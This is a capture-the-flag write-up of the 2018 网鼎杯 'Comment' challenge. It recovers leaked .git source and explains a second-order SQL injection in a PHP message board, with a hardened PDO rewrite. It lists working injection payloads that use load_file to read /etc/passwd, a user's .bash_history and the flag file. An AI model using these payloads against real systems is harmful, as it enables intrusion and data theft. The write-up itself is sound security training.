Code Audit Exercise 14: [网鼎杯 2018] Comment
程序员文章站
2022-05-19 10:00:59
Platform: buuoj.cn
Opening the target machine shows a message board.
Posting requires logging in; only the last three characters of the password are missing, so burp** does the job.
Scan the directories.
There is a .git leak; pull the source down with GitHacker.
write_do.php
It is not displayed completely,
so recover it from the git history.
The complete code is as follows:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
    switch ($_GET['do'])
    {
        case 'write':
            // addslashes escapes quotes for this INSERT only; MySQL stores the unescaped value
            $category = addslashes($_POST['category']);
            $title = addslashes($_POST['title']);
            $content = addslashes($_POST['content']);
            $sql = "insert into board
                set category = '$category',
                    title = '$title',
                    content = '$content'";
            $result = mysql_query($sql);
            header("Location: ./index.php");
            break;
        case 'comment':
            $bo_id = addslashes($_POST['bo_id']);
            $sql = "select category from board where id='$bo_id'";
            $result = mysql_query($sql);
            $num = mysql_num_rows($result);
            if($num>0){
                // category is read back raw from the database and reused without escaping
                $category = mysql_fetch_array($result)['category'];
                $content = addslashes($_POST['content']);
                // second-order injection point: $category is concatenated into a new query
                $sql = "insert into comment
                    set category = '$category',
                        content = '$content',
                        bo_id = '$bo_id'";
                $result = mysql_query($sql);
            }
            header("Location: ./comment.php?id=$bo_id");
            break;
        default:
            header("Location: ./index.php");
    }
}
else{
    header("Location: ./index.php");
}
?>
As you can see, addslashes is applied to every parameter.
But MySQL consumes the escaping when it stores the data, which means the value still lands in the database in its original, unescaped form.
And in this part,
mysql_fetch_array pulls category straight out of the result and splices it into the next query without escaping, which causes a second-order injection.
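For comparison, here is a hardened version of write_do.php. This is an added example, not the challenge's own code: both the user-supplied fields and the category read back from the board table are bound as prepared-statement parameters, so nothing is ever concatenated into SQL. It assumes mysql.php provides a PDO connection in a variable named $pdo (a hypothetical name) with PDO::ERRMODE_EXCEPTION enabled; the original mysql_* extension this site uses was removed in PHP 7, so the PDO switch is needed anyway.

```php
<?php
// Added example, not part of the original write-up: write_do.php rewritten with
// PDO prepared statements. Assumes mysql.php creates $pdo (hypothetical name),
// e.g. new PDO($dsn, $user, $pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]).
include "mysql.php";
session_start();

if (($_SESSION['login'] ?? '') !== 'yes') {
    header("Location: ./login.php");
    exit;
}

switch ($_GET['do'] ?? '') {
    case 'write':
        // Placeholders travel separately from the statement text, so quotes and
        // comment sequences such as ',/* in the input remain plain data.
        $stmt = $pdo->prepare(
            "INSERT INTO board (category, title, content) VALUES (:category, :title, :content)"
        );
        $stmt->execute([
            ':category' => $_POST['category'] ?? '',
            ':title'    => $_POST['title'] ?? '',
            ':content'  => $_POST['content'] ?? '',
        ]);
        header("Location: ./index.php");
        break;

    case 'comment':
        $bo_id = $_POST['bo_id'] ?? '';
        $stmt = $pdo->prepare("SELECT category FROM board WHERE id = :id");
        $stmt->execute([':id' => $bo_id]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row !== false) {
            // The category read back from the database is bound as a parameter
            // as well. This is the step the original code got wrong: a value that
            // was escaped on the way in is stored unescaped, so it has to be
            // treated as untrusted again on the way out.
            $stmt = $pdo->prepare(
                "INSERT INTO comment (category, content, bo_id) VALUES (:category, :content, :bo_id)"
            );
            $stmt->execute([
                ':category' => $row['category'],
                ':content'  => $_POST['content'] ?? '',
                ':bo_id'    => $bo_id,
            ]);
        }
        // urlencode keeps the id a single query-string value in the redirect
        header("Location: ./comment.php?id=" . urlencode($bo_id));
        break;

    default:
        header("Location: ./index.php");
}
```

The point of the fix is not the escaping function but where the trust boundary sits: escaping at input time only protects the statement the value is escaped for, while a stored value that is later read back and reused is input all over again. Parameterised queries make that distinction irrelevant, which is why they are the right fix for second-order injection rather than another layer of addslashes.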
Constructing the payload
Post a thread whose category is aaa',content=database(),/* and then, on the message board, submit a comment on it with */# as the content.
At that point the database statement is:
$sql = "insert into comment
    set category = 'aaa',content=database(),/*',
        content = '*/#',
        bo_id = '$bo_id'";
The trailing */#
joins up with the /* at the end of the previous line
and comments out everything in between,
so it becomes:
$sql = "insert into comment
    set category = 'aaa',
        content=database(),
and the database name is read successfully.
Solving
Use load_file to read files and find where things are:
aaa',content=(select( load_file('/etc/passwd'))),/*
Check which system commands have been run:
aaa',content=(select(load_file("/home/www/.bash_history"))),/*
Read .DS_Store as hex:
aaa',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
Read flag_8946e1ff1ee3e40f.php:
aaa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
PS: the flag read from under tmp/html is a fake one.
Decode the hex and you get the flag.